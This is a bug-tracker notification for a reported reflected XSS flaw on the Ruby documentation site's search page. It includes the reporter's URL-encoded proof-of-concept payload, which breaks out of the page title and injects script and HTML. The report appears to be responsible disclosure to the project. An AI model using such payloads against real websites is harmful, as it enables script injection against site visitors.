Issue #14389 has been updated by shevegen (Robert A. Heiler).


The twitter link above gives me "This account's Tweets are protected.", just
for your information.

----------------------------------------
Bug #14389: Reflected XSS 
https://bugs.ruby-lang.org/issues/14389#change-69761

* Author: TheGirdap (Hamit Cibo)
* Status: Open
* Priority: Normal
* Assignee: 
* Target version: 
* ruby -v: 
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN, 2.5: UNKNOWN
----------------------------------------
Hello,

Reflected Xss found ..

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

result ;

ss:

search:

search box > ....import+words+payload => reflected xss

https://twitter.com/hamit_cibo

---Files--------------------------------
Ekran_Resmi_2018-01-24_01.09.36 (1).png (187 KB)


-- 
https://bugs.ruby-lang.org/

Unsubscribe: <mailto:ruby-core-request / ruby-lang.org?subject=unsubscribe>
<http://lists.ruby-lang.org/cgi-bin/mailman/options/ruby-core>